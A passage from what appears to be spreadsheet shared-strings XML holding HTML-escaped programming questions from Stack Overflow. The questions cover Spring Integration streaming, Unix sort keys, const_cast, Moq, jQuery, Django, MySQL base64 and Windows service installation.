&lt;li&gt;&lt;p&gt;Files are picked up using a file:inbound-channel-adapter&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The file content is streamed, N lines at a time, to a 'Stage 1' channel, which parses the line into an intermediary (shared) representation. &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;This parsed line is routed to multiple 'Stage 2' channels.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Each 'Stage 2' channel does its own processing on the N available lines to convert them to a final representation. This channel must have a queue which ensures no Stage 2 channel is overwhelmed in the event that one channel processes significantly slower than the others.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The final representation of the N lines is written to a file. There will be as many output files as there were routing destinations in step 4.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;*&lt;em&gt;'N' above stands for any reasonable number of lines to read at a time, from [1, whatever I can fit into memory reasonably], but is guaranteed to always be less than the number of lines in the full file.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;How can I accomplish &lt;strong&gt;streaming (steps 3, 4, 5)&lt;/strong&gt; in Spring Integration? It's fairly easy to do without streaming the files, but my files are large enough that I cannot read the entire file into memory.&lt;/p&gt;
&lt;p&gt;As a side note, I have a working implementation of this work flow without Spring Integration, but since we're using Spring Integration in other places in our project, I'd like to try it here to see how it performs and how the resulting code compares for length and clarity.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sorting multiple keys with Unix sort</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have potentially large files that need to be sorted by 1-n keys.  Some of these keys might be numeric and some of them might not be.  This is a fixed-width columnar file so there are no delimiters.&lt;/p&gt;
&lt;p&gt;Is there a good way to do this with Unix sort?  With one key it is as simple as using '-n'.  I have read the man page and searched Google briefly, but didn't find a good example.  How would I go about accomplishing this?&lt;/p&gt;
&lt;p&gt;Note:  I have ruled out Perl because of the file size potential.  It would be a last resort.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is const_cast safe?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't find much information on const_cast.  The only info I could find (on Stack Overflow) is:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The const_cast&amp;lt;&gt;() is used to add/remove const(ness) (or volatile-ness) of a variable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This makes me nervous.  Could using a const_cast cause unexpected behavior?  If so, what?&lt;/p&gt;
&lt;p&gt;Alternatively, when is it okay to use const_cast?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Who's Using Cairngorm 2.2 with Imported Web Services?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm very new to Cairngorm, so apologies for what's probably a simple question:&lt;/p&gt;
&lt;p&gt;I'm working with a number of WCF services imported into Flex Builder 3 (via Data &gt; Manage Web Services), and I'm wondering how to expose those services to the ServiceLocator in Cairngorm.  From what I've read so far, it looks like Cairngorm prefers the services be defined in Services.mxml (or somehow in MXML), but that won't work in my case.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.net AJAX: textbox readonly state</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently have a button called Edit and a text box call blah on a ajax updatepanel. is it possible to set the asp.net's textbox Readonly via trigger? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a good way to debug unit tests written with multiple [Row] attributes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I run the following test in Gallio's Icarus it passes, but when I step into it using TestDriven.NET (Test With-&gt;Debugger), it fails because the parameters are not set according to the Row attributes.&lt;/p&gt;
&lt;p&gt;I was expecting that the method would be called once for each Row attribute applied.&lt;/p&gt;
&lt;p&gt;What am I doing wrong? If nothing, then what do I need to do to debug these tests when they break? Should I avoid parametrized tests if they are not debuggable?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[TestFixture]
public class TestDrivenIgnoresMbUnitAttributesWhenDebugging
{
    [Test]
    [Row(1)]
    [Row(2)]
    public void SomeFunc(int x)
    {
        Assert.AreNotEqual(default(int), x);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Replacing a word with another word zero or more times in javascript using regular expressions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a word : [lesserthen]   , that I need to replace with &amp;lt; zero or more times in a string. I'm using the String.replace method to do so. But the word is only replaced one time in the string, I need to be replaced more then one time. I'm very weak with regular expressions and I'm interested to find a solution for this problem.&lt;/p&gt;
&lt;p&gt;Here is the code I've been using:&lt;/p&gt;
 var wordReplaced="This a text with one [lesserthen], and another [lesserthen]";
 wordReplaced=wordReplaced.replace("[lesserthen]","
&lt;p&gt;The result I am aiming is : "This a text with one &amp;lt;, and another &amp;lt;". &lt;/p&gt;
&lt;p&gt;But what I got instead is : "This a text with one &amp;lt;, and another [lesserthen]"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Round Value of a Textbox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a small calculator that I am creating in C# (Sharp Develop). The user enters two values and the code returns the third. I am having trouble rounding the third value once it is returned. I have been through a couple of forums and the msdn site and I understand the code that is posted there, but I cant seem to make it work in my situation. Can anyone provide a little help? Reference the code below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int y; 
decimal x, z;
x = int.Parse(tb2_fla.Text);      
y = int.Parse(tb2_e.Text);
z = (x * y * 1.732050808m) / 1000;  
tb2_kva.Text = z.ToString();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I welcome both assistance and criticism&lt;br /&gt;
Greg&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A small question about python's variable scope</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a beginner of python and have a question, very confusing for me.
If I define a function first but within the function I have to use a variable which is defined in another function below, can I do it like this? Or how can I import the return things of another function into a function?
for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def hello(x,y):
    good=hi(iy,ix)
    "then do somethings,and use the parameter'good'."
    return something
def hi(iy,ix):
    "code"
    return good
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why do IE and Firefox render the same image differently, how can I prevent it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3199/3099078396_a3c4924c81_o.gif" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;On the left you will notice the google logo rendered by IE, I drew a black line at the top and bottom of the G which extends into the FF windows which rendered the same exact logo yet the FF version renders the image larger. There is NO css linked to this page, just plain and simple Html. &lt;/p&gt;
&lt;p&gt;Can anyone tell me why this is happening and can I prevent it? Is my box just fubar and no one else gets this behavior?&lt;/p&gt;
&lt;p&gt;Edit: Failed to mention IE7/FF3&lt;/p&gt;
&lt;p&gt;Edit: Posted Html as requested&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
&amp;lt;html xmlns="http://www.w3.org/1999/xhtml"&amp;gt;
&amp;lt;head id="ctl00_Head1"&amp;gt;&amp;lt;title&amp;gt;&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;img src="http://www.google.com/intl/en_ALL/images/logo.gif" /&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to analyse a HTTP dump?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a file that apparently contains some sort of dump of a keep-alive HTTP conversation, i.e. multiple GET requests and responses including headers, containing an HTML page and some images. However, there is some binary junk in between - maybe it's a dump on the TCP or even IP level (I'm not sure how to determine what it is).&lt;/p&gt;
&lt;p&gt;Basically, I need to extract the files that were transferred. Are there any free tools I could use for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What happens when you select a non-existing file for upload in an HTML form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On Internet Explorer, the standard HTML file upload form also allows for direct input of the file name (instead of using the file selector dialog). This makes it possible to enter non-existing files. On other browsers (which do not let you do that) I suppose this case can still occur if you delete the file after having selected it.&lt;/p&gt;
&lt;p&gt;In order to deal with bugs arising from this problem (like &lt;a href="http://dev.fckeditor.net/ticket/2716" rel="nofollow"&gt;this one&lt;/a&gt;), I need to add some validation code on the server-side (which is only possible if the request actually goes to the server, of which I am not sure at this point), or on the client-side (which cannot be very straightforward, as you cannot access the actual file from the JavaScript sandbox). Other than that, the only (and possibly best) option seems to be to hide the input box with CSS magic, like GMail does for attachment files.&lt;/p&gt;
&lt;p&gt;So, what happens when you try to upload a non-existing file?
Is there still a POST request being sent? Or will the browser abort, and if it does, how can I detect that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Moq tests using ExpectSet() with It.Is&lt;T&gt;() aren't behaving as... expected</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've isolated the behaviour into the following test case. I'd be grateful to anyone who can tell me how to expect/verify a property set for a &lt;code&gt;List&amp;lt;T&amp;gt;&lt;/code&gt; property - it appears there's something going on inside &lt;code&gt;It.Is&amp;lt;T&amp;gt;(predicate)&lt;/code&gt; that isn't making a whole lot of sense to me right now. Sample code will run as a console app from VS2008 - you'll need to add a reference to Moq 2.6 (I'm on 2.6.1014.1) - please try uncommenting the different ExpectSet statements to see what's happening...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using Moq;
using System.Collections.Generic;
namespace MoqDemo {
    public interface IView {
        List&amp;lt;string&amp;gt; Names { get; set; }
    }
    public class Controller {
        private IView view;
        public Controller(IView view) {
            this.view = view;
        }
        public void PopulateView() {
            List&amp;lt;string&amp;gt; names = new List&amp;lt;string&amp;gt;() { "Hugh", "Pugh", "Barney McGrew" };
            view.Names = names;
        }
        public class MyApp {
            public static void Main() {
                Mock&amp;lt;IView&amp;gt; mockView = new Mock&amp;lt;IView&amp;gt;();
                // This works - and the expectation is verifiable.
                mockView.ExpectSet(mv =&amp;gt; mv.Names);
                // None of the following can be verified.
                // mockView.ExpectSet(mv =&amp;gt; mv.Names, It.Is&amp;lt;Object&amp;gt;(o =&amp;gt; o != null));
                // mockView.ExpectSet(mv =&amp;gt; mv.Names, It.Is&amp;lt;List&amp;lt;string&amp;gt;&amp;gt;(names =&amp;gt; names.Count == 3));
                // mockView.ExpectSet(mv =&amp;gt; mv.Names, It.IsAny&amp;lt;IList&amp;lt;String&amp;gt;&amp;gt;());
                Controller controller = new Controller(mockView.Object);
                controller.PopulateView();
                try {
                    mockView.VerifyAll();
                    Console.WriteLine("Verified OK!");
                } catch (MockException ex) {
                    Console.WriteLine("Verification failed!");
                    Console.WriteLine(ex.Message);
                }
                Console.ReadKey(false);
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Best practices to test Asp.net MVC applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whats the best practice to test an Asp.net MVC application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Have you come across any reason for three levels of indirection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just flicking through one of my favourite books (Ellen Ullman's The Bug) and there is a small bit where one programmer confronts another over three levels of indirection:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;***object_array = ***winarray;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get the idea of double indirection - a way of passing a pointer into a function, and allowing it to point to an object created within the function.&lt;/p&gt;
&lt;p&gt;But have you come across any reason to use three (or more) levels of indirection?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery: Can I do $('.superset').$('.within') instead of $('.within', $('.superset'))?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can jQuery be extended so that I can use the above syntax?&lt;/p&gt;
&lt;p&gt;I can't figure out how to prototype whatever it is $() returns, so that I can call $().$()&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Space-Efficient Data Structure for Storing a Word List?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anything better than a &lt;a href="http://en.wikipedia.org/wiki/Trie" rel="nofollow"&gt;Trie&lt;/a&gt; for this situation?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Storing a list of ~100k English words&lt;/li&gt;
&lt;li&gt;Needs to use minimal memory&lt;/li&gt;
&lt;li&gt;Lookups need to be reasonable, but don't have to be lightning fast&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm working with Java, so my first attempt was to just use a Set&amp;lt;String&amp;gt;. However, I'm targeting a mobile device and already running low on memory. Since many English words share common prefixes, a trie seems like a decent bet to save some memory -- anyone know some other good options?&lt;/p&gt;
&lt;p&gt;EDIT - More info - The data structure will be used for two operations&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Answering: Is some word XYZ in the list?&lt;/li&gt;
&lt;li&gt;Generating the neighborhood of words around XYZ with one letter different&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks for the good suggestions&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC Upgrade to Beta: IControllerFactory is defined in an assembly that is not referenced</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently in the process of updating a site from preview 2 of ASP.NET MVC to the Beta release. I'm down to my last compile error with no solution in site after an exhaustive search. I have some code in Global.asax.cs which sets up IOC using the Windsor container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ControllerBuilder.Current.SetControllerFactory(typeof(WindsorControllerFactory));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The compiler is complaining that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;The type 'System.Web.Mvc.IControllerFactory' is defined in an assembly that is not referenced. 
You must add a reference to assembly 'System.Web.Mvc, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The weird thing is that this assembly &lt;strong&gt;is&lt;/strong&gt; referenced. I reference it from the MVC beta assemblies folder and set to copy local. I can even delete the bin directory, rebuild, then view the assembly in reflector and see the interface. I've tried removing and re-adding the reference, changing web.config's assemblies and namespace sections. I even removed System.Web.Mvc from the GAC to make sure it was using the correct copy.&lt;/p&gt;
&lt;p&gt;While writing this question it occurred to me that perhaps Windsor is internally expecting the older version of the assembly. I'm downloading the latest from MvcContrib to determine if this is the issue and I'll post the result. If this is the case, shouldn't the version number of the assembly have changed with the latest release to make this obvious?&lt;/p&gt;
&lt;p&gt;Thanks for reading,
Brett&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Alternate background colors for list items</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list, and each item is linked, is there a way I can alternate the background colors for each item?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;a href="link"&amp;gt;Link 1&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;a href="link"&amp;gt;Link 2&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;a href="link"&amp;gt;Link 3&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;a href="link"&amp;gt;Link 4&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;a href="link"&amp;gt;Link 5&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Query to find all the tables with date columns in it</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anybody let me know the query to find all the tables that has a  date columns on it.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Django FormWizard with dynamic forms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to implement a simple 2 part FormWizard.
Form 1 will by dynamically generated something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class BuyAppleForm(forms.Form):
   creditcard = forms.ChoiceField(widget = forms.RadioSelect)
   type = forms.ChoiceField(widget = forms.RadioSelect)
   def __init__(self,*args, **kwargs):
        user = kwargs['user']
        del kwargs['user']
        super(BuyAppleForm, self).__init__(*args, **kwargs)
        credit_cards = get_credit_cards(user)
        self.fields['creditcard'].choices = [(card.id,str(card)) for card in credit_cards]
        apple_types= get_types_packages()
        self.fields['type'].choices = [(type.id,str(type)) for type in apple_types]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will dynamically create a form with lists of available choices.&lt;/p&gt;
&lt;p&gt;My second form, I actually want no input. I just want to display a confirmation screen containing the credit card info, apple info, and money amounts (total, tax, shipping). Once user clicks OK, I want the apple purchase to commence.&lt;/p&gt;
&lt;p&gt;I was able to implement the single form way by passing in the request.user object in the kwargs. However, with the FormWizard, I cannot figure this out.&lt;/p&gt;
&lt;p&gt;Am I approaching the problem wrong and is the FormWizard not the proper way to do this? If it is, how can the Form &lt;code&gt;__init__&lt;/code&gt; method access the user object from the HTTP request? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>base64 encode in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to select a blob col from one table, base64 encode it and insert it into another tables. Is there any way to do this without round tripping the data out of the DB and through my app?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Search date in SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having an Event Management System in which i want,&lt;/p&gt;
&lt;p&gt;If an event is registered for 5 days (21 jan 2009 to 26 Jan 2009) Then if another person wants to register an event between 22 jan 2009 to 24 jan 2009 then it will not allow to register. I want to check this using SQL query, so please tell me how can i do this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to install a windows service programmatically in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 3 projects in my VS solution. 1 is a web app, the other is a windows service and the last one a setup project for my web app. &lt;/p&gt;
&lt;p&gt;What i want is by the end of the installation of the web app in my setup project, within my custom action to try and install my windows service given that i have the location of the assembly by then.&lt;/p&gt;
&lt;p&gt;Thanks for all the help in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>auto-check radio-button using struts</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a jsp page with two radio tags. &lt;/p&gt;
&lt;p&gt;The page contains a struts2 form. When I submit the form one of two radio must be automatically checked.&lt;/p&gt;
&lt;p&gt;Is it possible to do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When adding new items to a database with foreign keys, should I use SQL triggers to create the related rows in other tables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am implementing a database design that has a vehicle table, vehicle engine and vehicle gear table with SQL 2005.&lt;/p&gt;
&lt;p&gt;Each table has an ID that is a SQL identity number, and each engine and gear has a relation with the vehicle ID.
So before I create a vehicle I must create an engine and gear.&lt;/p&gt;
&lt;p&gt;How could I know the vehicle identity number when creating the engine and gear? The vehicle row hasn't yet been created because of the foreign key constraint with the engine and gear tables?&lt;/p&gt;
&lt;p&gt;Should I implement an automatic trigger that on a creation of a vehicle creates an empty row for the engine and gear linked to the vehicle? But again how could I know the vehicle ID?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JQuery Loop over JQueryObjects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method, which will accept a parameter of a JQuery Object and will calculate totals for a section. So if you give it a JQuery Object of a div containing the section it will calculate a total for it&lt;/p&gt;
&lt;p&gt;so you can do this:&lt;/p&gt;
&lt;p&gt;var $totalcompletion = CalculateSectionCompletion(jQuery("#Section1"));&lt;/p&gt;
&lt;p&gt;Now I have multiple divs with the class of section container. I want to be able to call the above method on any div with that class.&lt;/p&gt;
&lt;p&gt;I'm doing this:&lt;/p&gt;
&lt;p&gt;jQuery("div.SectionContainer").each(
    function(i, valueOfElement){&lt;br /&gt;
    	CalculateSectionCompletion(valueOfElement);&lt;br /&gt;
        });&lt;/p&gt;
&lt;p&gt;The problem is the valueOfElement is actually the DOM object and not the JQuery Object, so I can't pass this in to my method.&lt;/p&gt;
&lt;p&gt;Is there anyway I can loop through all JQuery Objects selected by a query, without writing some dirty code to extract the Id from the DOM object, and call JQuery(valueOfElement.id) and pass it in?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to make an expandable/collapsible subTable with rich:dataTable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently ported an application from JSF 1.1 to JSF 1.2. In the process we removed tomahawk and decided to use rich instead.&lt;/p&gt;
&lt;p&gt;Now I need a way to make an expandable/collapsible detailViev for each row in the table. &lt;/p&gt;
&lt;p&gt;The only thing I can think of is something along these lines (adapted from documentation at docs.jboss.com):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;rich:dataTable value="#{capitalsBean.capitals}" var="capitals"&amp;gt;
    &amp;lt;rich:column&amp;gt;
        ...
    &amp;lt;/rich:column&amp;gt;
    &amp;lt;rich:subTable value="#{capitals.details}" var="detail" ajaxKeys="#{bean.ajaxSet}" binding="#{bean.subtable}" id="subtable" rendered="detail.detailOpened"&amp;gt;
        &amp;lt;rich:column&amp;gt;
            ...
        &amp;lt;/rich:column&amp;gt;
    &amp;lt;/rich:subTable&amp;gt;
&amp;lt;/rich:dataTable&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I guess something like that would work. The problem is that I either have to add a getDetailOpened and a setDetailOpened to the objects I use, or wrap each object in another object that provides those two methods.&lt;/p&gt;
&lt;p&gt;Anybody knows a better way, or how it is supposed to be done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I implement Advanced combobox in CakePHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have implemented combobox in cakephp using following statement - &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo $form-&amp;gt;select('brand_id',array($brands),null,array(),'Choose Brand');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;for brand and input form for category - &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo $form-&amp;gt;input('category_id',array('type'=&amp;gt;'select',$categories,'empty'=&amp;gt;'Choose Category'));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but none of above option allows me to add my text input to brand or category, like say I want to add an input which is not there in the combobox, how should i go about it. &lt;/p&gt;
&lt;p&gt;Like a link in the combobox or textbox in combobox?&lt;/p&gt;
&lt;p&gt;-skr&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do I get an error using moveTo in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am opening a new window from a button using var myWindow = window.open(...). I then want to move that window to the correct location on the screen. I use myWindow.moveTo(10,10) to do this but I get an Access Denied error.&lt;/p&gt;
&lt;p&gt;The window I open contains information from another server to the one I am executing on. When it isn't, the window moves correctly. Is this the limitation and is there a way around it?&lt;/p&gt;
&lt;p&gt;I am using IE7. (The work is for an existing Intranet that includes lots of ActiveX so all users use IE7)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>error C2065: 'CoInitializeEx' : undeclared identifier</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I get the following error while trying to use &lt;code&gt;hres =  CoInitializeEx(0, COINIT_MULTITHREADED);&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;error C2065: 'CoInitializeEx' : undeclared identifier&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have already included:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define _WIN32_DCOM
#include &amp;lt;iostream&amp;gt;
using namespace std;
#include &amp;lt;comdef.h&amp;gt;
#include &amp;lt;Wbemidl.h&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in my cpp file.&lt;/p&gt;
&lt;p&gt;Kindly help.&lt;/p&gt;
&lt;p&gt;Thanks,
Neha&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Batch how to end an for-loop properly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;for testing purposes i need an recursive directory with some files, that comes to maximum path-length.&lt;/p&gt;
&lt;p&gt;The Script used for the creation consists only of two for-loops, as followed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for /L %%a in (1 1 255) do @(
    mkdir %%a
    &amp;amp;&amp;amp; cd %%a
    &amp;amp;&amp;amp; for /L %%b in (1 1 %random%) do @(
    		echo %%b &amp;gt;&amp;gt; %%a.txt
    	)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I would like to embed this script as part of another script, since more is to be done, but I can not add any other commands around it or it refuses working. I use this under windows vista, if this is useful to you.&lt;/p&gt;
&lt;p&gt;Nor it works if i write &lt;code&gt;"@ECHO OFF&lt;/code&gt;" in first line, neither with "&lt;code&gt;echo done&lt;/code&gt;" on the last line.&lt;/p&gt;
&lt;p&gt;output on commandline is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;X:\Scripte&amp;gt;recursive.cmd
OFFfor /L %a in (1 1 255) do @( mkdir %a
The system cannot find the path specified.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT:
Seems to be a problem with layer 8, the problem seems to be in the command shell used, if used the bare cmd.exe, it works, with visual studio 2008 command shell it does not work, like stated above.&lt;/p&gt;
&lt;p&gt;anyway, thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Specifying attribute values as CDATA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can one specify XML attribute values as CDATA ? If yes - what would be the schema for the same. If not - why is this limitation not addressed in XML ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the FxCop custom dictionary to work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is it possible to get the FxCop custom dictionary to work correctly?&lt;/p&gt;
&lt;p&gt;I have tried adding words to be recognised to the file 'CustomDictionary.xml', which is kept in the same folder as the FxCop project file.  This does not seem to work, as I still get the 'Identifiers should be spelled correctly' FxCop message, even after reloading and re-running FxCop.  Using version 1.36.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating a delegate type inside a method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a delegate type in C# inside a method for the purpose of creating Anonymous methods.&lt;/p&gt;
&lt;p&gt;For Example :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
public void MyMethod(){
   delegate int Sum(int a, int b);
   Sum mySumImplementation=delegate (int a, int b) {return a+b;}
   Console.WriteLine(mySumImplementation(1,1).ToString());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unfortunately, I cannot do it in .NET 2.0 and C# 2.0.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>path name and arguments of running processes using java code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to get the path name and arguments of running processes using java code. Is there any solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oxite or S#arp Architecture for new Asp.net CMS site</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to build a CMS site based on Asp.Net Mvc and I want to choose my starting point.&lt;/p&gt;
&lt;p&gt;I have seen that there is a lot of interest in the new Microsoft Oxite project also if it seems to be pretty early to adopt it in a production project.&lt;br /&gt;
I've also looked at S#arp Architecture but it does not properly compare to Oxite as is just a starting point for general Asp.Net Mvc sites.&lt;/p&gt;
&lt;p&gt;For me S#arp Architecture has some advantages over Oxite as is far less complex and it uses Nhibernate for the data access layer.&lt;br /&gt;
Oxite code uses Linq2Sql for it's DAL and has already a project in the solution that requires the DB version for VS2008.&lt;br /&gt;
Oxite seems to me more blog oriented than CMS oriented but I havenâ€™t looked the code deeply.&lt;/p&gt;
&lt;p&gt;Here are some of the choices that would point me to S#arp Ar. for starting.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Simple clean architecture&lt;/li&gt;
&lt;li&gt;Nhibernate Dal&lt;/li&gt;
&lt;li&gt;Community supported&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Oxite:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Microsoft project  &lt;/li&gt;
&lt;li&gt;Potential huge community  &lt;/li&gt;
&lt;li&gt;Early stages but very good code quality  &lt;/li&gt;
&lt;li&gt;Provider model that permits to easily switch the DAL  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If anyone has looked at the code of these two projects please advice on your opinions.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cocoa equivalent of .NET's Environment.SpecialFolder for saving preferences/settings?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get the reference to a folder for storing per-user-per-application settings when writing an Objective-C Cocoa app in Xcode?&lt;/p&gt;
&lt;p&gt;In .NET I would use the &lt;code&gt;Environment.SpecialFolder&lt;/code&gt; enumeration:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's the Cocoa equivalent?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting started with Tomcat docs</t>
  </si>
  <si>
